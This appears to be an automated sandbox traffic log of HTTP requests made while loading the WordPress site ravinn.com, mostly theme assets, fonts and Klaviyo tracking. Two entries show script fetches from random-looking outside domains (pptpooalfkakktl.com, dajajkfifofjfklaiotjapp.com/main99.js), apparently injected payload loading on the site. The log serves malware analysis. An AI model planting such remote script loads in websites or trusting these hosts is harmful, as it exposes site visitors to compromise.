            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/style.css?ver=6.7.2 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/js/loadmore.js?ver=6.7.2 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/ravinnlogo.svg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo4.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo1.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/ravinnlogo.svg HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo5-e1701428252408.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo4.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo1.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/js/isotope.pkgd.min.js HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/js/bootstrap.js?v=1743482759 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/js/splide.min.js HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/js/splide-extension-auto-scroll.js HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /clou?ts=1743482759 HTTP/1.1Host: pptpooalfkakktl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /releases/v6.4.2/css/all.css?ver=6.4.2 HTTP/1.1Host: use.fontawesome.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /onsite/js/klaviyo.js?company_id=WnvUEf HTTP/1.1Host: static.klaviyo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/themes/ravinn/js/script.js?v=1743482759 HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/QS_logo_large-1-e1705392262535.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo2.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo5-e1701428252408.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /releases/v6.4.2/webfonts/fa-solid-900.woff2 HTTP/1.1Host: use.fontawesome.comConnection: keep-aliveOrigin: https://www.ravinn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://use.fontawesome.com/releases/v6.4.2/css/all.css?ver=6.4.2Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /releases/v6.4.2/webfonts/fa-brands-400.woff2 HTTP/1.1Host: use.fontawesome.comConnection: keep-aliveOrigin: https://www.ravinn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://use.fontawesome.com/releases/v6.4.2/css/all.css?ver=6.4.2Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /onsite/js/fender_analytics.611d7935dc9085329d0a.js?cb=1 HTTP/1.1Host: static-tracking.klaviyo.comConnection: keep-aliveOrigin: https://www.ravinn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/QS_logo_large-1-e1705392262535.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/Data3.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /onsite/js/static.4b8f99d71b7685ee4f53.js?cb=1 HTTP/1.1Host: static-tracking.klaviyo.comConnection: keep-aliveOrigin: https://www.ravinn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /main99.js HTTP/1.1Host: dajajkfifofjfklaiotjapp.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /onsite/js/runtime.d6f8c2852d4e7a72345c.js?cb=1 HTTP/1.1Host: static.klaviyo.comConnection: keep-aliveOrigin: https://www.ravinn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /onsite/js/sharedUtils.db6638454dfe7d02bbcd.js?cb=1 HTTP/1.1Host: static.klaviyo.comConnection: keep-aliveOrigin: https://www.ravinn.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo3.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/logo2.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/AITC.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/logo.png HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/About-Ravinn.svg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/Data3.png HTTP/1.1Host: www.ravinn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/The-Team.svg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
            Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/044-R141223.jpg HTTP/1.1Host: www.ravinn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ravinn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_63LK6Z20GR=GS1.1.1743549626.1.0.1743549626.0.0.0; _ga=GA1.1.1902210158.1743549627; __kla_id=eyJjaWQiOiJNREkxTVdNMk1UZ3RNakJoTWkwME5XWTBMV0ptT0dVdFpEZzBNV1ExTmpjM01ESmsiLCIkcmVmZXJyZXIiOnsidHMiOjE3NDM1NDk2MjcsInZhbHVlIjoiIiwiZmlyc3RfcGFnZSI6Imh0dHBzOi8vd3d3LnJhdmlubi5jb20vIn0sIiRsYXN0X3JlZmVycmVyIjp7InRzIjoxNzQzNTQ5NjI3LCJ2YWx1ZSI6IiIsImZpcnN0X3BhZ2UiOiJodHRwczovL3d3dy5yYXZpbm4uY29tLyJ9fQ==
